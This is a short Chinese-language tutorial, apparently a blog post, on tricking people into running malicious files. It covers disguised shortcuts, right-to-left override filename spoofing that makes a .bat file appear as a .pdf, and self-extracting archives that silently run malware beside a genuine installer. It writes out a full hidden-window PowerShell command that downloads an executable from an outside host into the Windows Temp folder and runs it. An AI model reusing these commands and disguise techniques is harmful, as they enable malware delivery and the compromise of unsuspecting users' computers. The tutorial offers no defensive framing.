1.快捷方式

隐藏恶意文件，利用命名及图标伪装的快捷方式诱导点击。

指令流程为：调用powershell->隐藏窗口->远程下载线上的恶意文件->存储到隐蔽的temp目录下，命令行运行恶意文件

比如这一个简单的弹窗的bat文件

@echo off
chcp 65001 > nul
set count=0
:loop
if %count% geq 10 goto end
start cmd /k "echo 第 %count% 个弹窗"
set /a count+=1
goto loop
:end
exit

转换为exe文件，调用的快捷方式内容应为：

C:\Windows\System32\cmd.exe /c powershell.exe -nop -w hidden -command IEX (new-object net.webclient).DownloadFile('https://hhh3m.top/misc/1.exe','C:\Windows\Temp\1.exe');&cmd /c "C:\Windows\Temp\1.exe"

最后自定义修改一下图标与命名伪装即可

2.RLO编码文件名欺骗

在windows下，如果字符串中存在Unicode字符RLO，则该字符右边的字符串会逆序显示，将后缀进行颠倒，实现文件名欺骗，不更改文件原本类型。
实现过程
F2进行重命名后在.bat前右键选择 ->插入Unicode控制字符 ->RLO，输入fdp回车（该编码会导致输入显示逆序）即变成了pdf格式文件

最终效果

3.自解压文件

比如利用winrar把恶意文件和正常软件安装包一起打包为自解压文件，自定义解压目录，设置解压后同时运行安装包和恶意程序（使用隐藏静默模式，以达成无感知效果）

最后利用ResourceHacker工具，将正常软件的图标和version信息提取替换到自解压文件中伪装为正常安装包即可